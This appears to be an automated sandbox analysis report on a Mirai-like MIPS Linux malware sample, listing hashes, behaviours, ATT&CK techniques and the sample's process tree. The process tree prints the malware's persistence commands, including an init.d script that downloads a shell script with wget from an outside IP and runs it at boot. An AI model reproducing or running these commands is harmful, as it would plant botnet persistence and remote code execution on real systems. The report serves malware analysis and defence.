Analysis
-
max time kernel
99s -
max time network
160s -
platform
debian-12_mipsel -
resource
debian12-mipsel-20240418-en -
resource tags
-
submitted
20/11/2024, 03:26
General
-
Target
mipsel.nn.elf
-
Size
134KB
-
MD5
2fcff406e1f57e00d98b987d23cd398f
-
SHA1
7675a391d83a38868d5f9194a9c7248291e1705a
-
SHA256
f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067
-
SHA512
6003c40f6af2626ab5fcf6fc381e4e27abb624111d8e297d24b2110d78134ade98cc702e0fe3c556b65900b9a03efbde16e53395280bdbf395b9d936c19227de
-
SSDEEP
1536:tLXuqtWr4N9zWJPEceN7U9empeIwOdzZXz8EmbycedlGcYx3dZ3aHXzy+LwCvnqX:puqtWr4DItmecedlotFU3vnqln
Malware Config
Signatures
-
Contacts a large (8910) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies init.d 2 TTPs 2 IoCs
Adds/modifies system service, likely for persistence.
-
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Modifies Bash startup script 2 TTPs 1 IoCs
-
Changes its process name 1 IoCs
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
Processes
-
/tmp/mipsel.nn.elf/tmp/mipsel.nn.elf1⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Modifies init.d
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
- Reads runtime system information
- System Network Configuration Discovery
-
/bin/shsh -c "systemctl enable custom.service >/dev/null 2>&1"2⤵
-
/usr/bin/systemctlsystemctl enable custom.service3⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
-
/usr/bin/chmodchmod +x /etc/init.d/mybinary3⤵
- File and Directory Permissions Modification
-
-
-
/bin/shsh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"2⤵
-
/usr/bin/lnln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary3⤵
-
-
-
/bin/shsh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://87.120.84.247/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"2⤵
- File and Directory Permissions Modification
- Modifies init.d
-
-
/bin/shsh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
-
/usr/bin/chmodchmod +x /etc/init.d/sh3⤵
- File and Directory Permissions Modification
-
-
-
/bin/shsh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"2⤵
-
/usr/bin/mkdirmkdir -p /etc/rc.d3⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"2⤵
-
/usr/bin/lnln -s /etc/init.d/sh /etc/rc.d/S99sh3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
110B
MD52a3758c7be4b51e45514ca71272a2241
SHA116f6c47091d87086ae361ee9653af0bbb3f0afb7
SHA25605e88586f84b6ddddd894580aa50f2b066be6520174c497e5957860e07f51ea7
SHA512246177d06d5c8d2444663c4d4828f3be8ca640123b6f0934add6953aa9b54e12e7114912644503fd598aa57dedd5a4392e14e136ce2c628899ed1f607a2b77ee
-
Filesize
97B
MD50680c195fdd2fca0a0e632cf637d150e
SHA17ded21dcbe33cfde13db634f159b7748b28b61c1
SHA2561d1be04cff45dde0d7a8a6e60e5c6e65312108a926d235892a04b0b2ce6cf38d
SHA512fad47bb194885f9e6b7875e99f4469807eb1aaac0fa7d04b647420bce466a1eb422320eafa59e180bdbd4c69414f671138fb60bdd87403a414f0624d678e497f
-
Filesize
354B
MD5064ba5f4b09e62ca552b70a2e94d6393
SHA17076e742aa5e9757e555091c4a72206018115518
SHA256038696b3a44f62a700ee8e6187eef48c8e817068900363d4e527b14899fc22a1
SHA5125488263037dd93ae9daa23e987a2c4016ad4f241d3d318abfbba4d19bf67fa7e1084bf09f03ab07580df49a3b8ac45767e6cbc03cf7e71afff5adb942ef42eb9
-
Filesize
102B
MD5e5e2c6d263b0ee1c9c19d46192ad5cdf
SHA13197ca0f3394eedd2c4702cb6eaf7a22817d5fef
SHA256436aed8a5a70ab60873b71384b840ddcb839185208bd3bddb2b6a627e053a548
SHA512bd5e7113e820c1771eeedac572c16201bcc490b820d5d18323f03dfa7e263e14f1bacbf5923a24daac0db1f9789ace29682307464e098f72820655537b6c2786
-
Filesize
291B
MD5a31178fddb5564754ff49f0865dd2b20
SHA1f0b205696a09245229469d0ac1809135be57a837
SHA256d6f5a8734ff982cb1d46c25cad29fe1d09421ec31d364c507766a41cb775878d
SHA5127e2e400c9b70d54c7f4c196e8cf7970d4510577ab2777ab7694cb254445a68128256d10750e156681fdab7f35469f0efd9632ddc5432fb078ebf6f57da382a9d